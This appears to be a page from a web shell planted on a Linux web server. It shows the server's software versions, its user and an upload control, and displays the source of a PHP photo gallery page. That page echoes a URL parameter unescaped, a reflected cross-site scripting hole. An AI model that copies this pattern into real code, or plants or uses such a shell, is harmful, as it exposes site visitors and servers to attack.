( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/..//tmpr/..//photo.php
<?php 
    if (isset($_GET['album'])) {
	  echo $_GET['album'];
	} else {
	  echo 'Photo Gallery';
	}
  ?>
  
  
     
    <div class="gallery">  
  <?php include "folio-gallery.php"; ?>
</div>
    
    
               
            
<center> <table width="854" border="0">
  <tr>
    <td height="80">&nbsp;</td>
  </tr>
  <tr>
    <td>
    
    
    <!-- start gallery header --> 
<link rel="stylesheet" type="text/css" href="../../../Users/OnaTV/Desktop/folio-gallery.css" />
<script type="text/javascript" src="../../../Users/OnaTV/Desktop/js/jquery-1.9.1.min.js"></script>

<link rel="stylesheet" type="text/css" href="../../../Users/OnaTV/Desktop/colorbox/colorbox.css" />
<!--<link rel="stylesheet" type="text/css" href="fancybox/fancybox.css" />-->
<script type="text/javascript" src="../../../Users/OnaTV/Desktop/colorbox/jquery.colorbox-min.js"></script>
<!--<script type="text/javascript" src="fancybox/jquery.fancybox-1.3.1.min.js"></script>-->
<script type="text/javascript">
$(document).ready(function() {	
	
	// colorbox settings
	$(".albumpix").colorbox({rel:'albumpix'});
	
	// fancy box settings
	/*
	$("a.albumpix").fancybox({
		'autoScale	'		: true, 
		'hideOnOverlayClick': true,
		'hideOnContentClick': true
	});
	*/
});
</script>
<!-- end gallery header -->

    
    
    
    
    
    
    
    
    
    
    
    <div class="gallery">  
  <?php include "../../../Users/OnaTV/Desktop/folio-gallery.php"; ?>
</div>
    
    
    
    
    
    
    </td>
  </tr>
</table>
</center>